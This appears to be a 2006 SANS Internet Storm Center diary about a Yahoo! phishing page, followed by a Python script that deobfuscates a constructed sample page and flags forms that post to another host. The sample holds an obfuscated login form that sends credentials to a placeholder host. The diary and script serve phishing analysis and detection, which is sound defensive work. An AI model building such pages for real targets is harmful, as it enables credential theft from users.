SANS ISC: Yahoo! user account phishing - SANS Internet Storm Center

Yahoo! user account phishing

One of our readers, Bill, recently sent us some information about a fairly decent phishing web site.
The web site, which you can see below, is actually hosted on Geocities. The URL will immediately alert any user who knows what to look for (and this is why we cannot stress enough how important user awareness and education are).
As you can see below, the design is fairly good, and if you don't check the URL, you might be fooled into entering your credentials here.

There are a couple of issues here that we wrote about recently. While we were looking at bank web sites in the original diary by Johannes, we have a similar problem here: although the credentials are transferred over the network securely (using SSL), the front web page is served over plain HTTP.
A typical user doesn't know how to check what happens once he clicks on the "Login" button, so it's very easy to launch phishing attacks like this against them.
That's why you should always use SSL on the front web page at least (yes, there are numerous other attacks on this, but let's stick to this subject for the moment).

Back to the phishing web page. Once a user tries to log in, his credentials are sent to a CGI script on a remote site, which then (probably) e-mails them to the attacker.
The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates the HTML code using JavaScript, but since the browser still needs to be able to parse the HTML, the decoding function always has to be present in the page, so with some spare time you can easily deobfuscate it.
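As an added illustration of that point (not code from the diary, and not HTML Protector's actual encoding): the constructed page below hides its login form behind a `document.write(unescape("..."))` wrapper, and the analysis script recovers the form statically, without running any script, then flags the two indicators the diary describes, a form that posts to a different host and a plain-HTTP page fronting an HTTPS submission. `example.invalid` hostnames and the CGI path are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample: a plain-HTTP page whose login form is percent-encoded
# and written out by the browser at load time (not HTML Protector's scheme).
PAGE_URL = "http://example.invalid/~phish/yahoo/"
OBFUSCATED_PAGE = (
    '<html><head><title>Yahoo! Mail</title></head><body><script>'
    'document.write(unescape("%3Cform%20method%3D%22post%22%20action%3D'
    '%22https%3A%2F%2Fcgi.example.invalid%2Fcgi-bin%2Flogin.cgi%22%3E'
    '%3Cinput%20name%3D%22login%22%3E%3Cinput%20type%3D%22password%22%20'
    'name%3D%22passwd%22%3E%3C%2Fform%3E"))'
    '</script></body></html>'
)

UNESCAPE_CALL = re.compile(r'unescape\("([^"]*)"\)')

def recover_hidden_html(page: str) -> str:
    """Decode every unescape("...") literal without executing any script.
    The decoder the page ships with is plain percent-decoding, so we apply it
    ourselves (%uXXXX forms, which JS unescape also accepts, are not handled)."""
    return "".join(unquote(m.group(1)) for m in UNESCAPE_CALL.finditer(page))

class FormCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action", ""))

def form_targets(page_url: str, page: str) -> list:
    """Return (action, findings) for each form, in the clear or script-written."""
    collector = FormCollector()
    collector.feed(page)                       # forms visible in the clear
    collector.feed(recover_hidden_html(page))  # forms the script would write
    page_host = urlparse(page_url).hostname
    results = []
    for action in collector.actions:
        target = urlparse(action)
        findings = []
        if target.hostname and target.hostname != page_host:
            findings.append("posts to another host")
        if urlparse(page_url).scheme == "http" and target.scheme == "https":
            findings.append("plain-HTTP page fronting an HTTPS submission")
        results.append((action, findings))
    return results
```

Running `form_targets(PAGE_URL, OBFUSCATED_PAGE)` on the sample yields the hidden form's remote CGI action with both findings attached.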

Jul 6th 2006